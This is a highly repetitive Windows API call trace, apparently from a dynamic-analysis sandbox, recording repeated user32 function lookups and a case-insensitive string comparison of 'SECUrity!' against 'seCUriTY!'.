GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.257] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.257] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.257] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.257] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.257] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.257] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.258] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.258] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.258] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.258] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.258] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.258] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.258] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.258] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.258] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.259] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.259] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.259] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.259] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.259] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.259] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.259] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.259] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.259] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.259] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.260] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.260] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.260] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.260] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.260] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.260] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.260] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.260] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.260] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.260] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.261] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.261] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.261] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.261] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.261] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.261] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.261] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.261] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.261] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.262] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.262] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.262] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.262] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.262] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.262] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.262] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.262] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.262] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.263] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.263] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.263] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.263] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.263] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.263] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.263] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.263] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.263] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.263] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.264] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.264] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.264] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.264] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.264] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.264] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.264] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.264] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.264] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.264] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.265] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.265] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.265] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.265] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.265] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.265] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.265] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.265] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.265] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.266] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.266] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.266] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.266] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.266] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.266] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.266] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.266] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.266] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.267] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.267] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.267] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.267] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.267] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.267] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.267] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.267] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.267] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.268] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.268] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.268] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.268] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.268] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.268] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.268] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.268] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.268] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.269] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.269] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.269] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.269] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.269] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.269] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.269] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.269] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.269] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.269] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.270] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.270] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.270] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.270] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.270] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.270] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.270] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.270] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.270] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.270] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.271] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.271] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.271] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.271] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.271] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.271] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.271] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.271] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.271] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.272] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.272] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.272] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.272] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.272] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.272] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.272] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.272] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.272] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.273] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.273] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 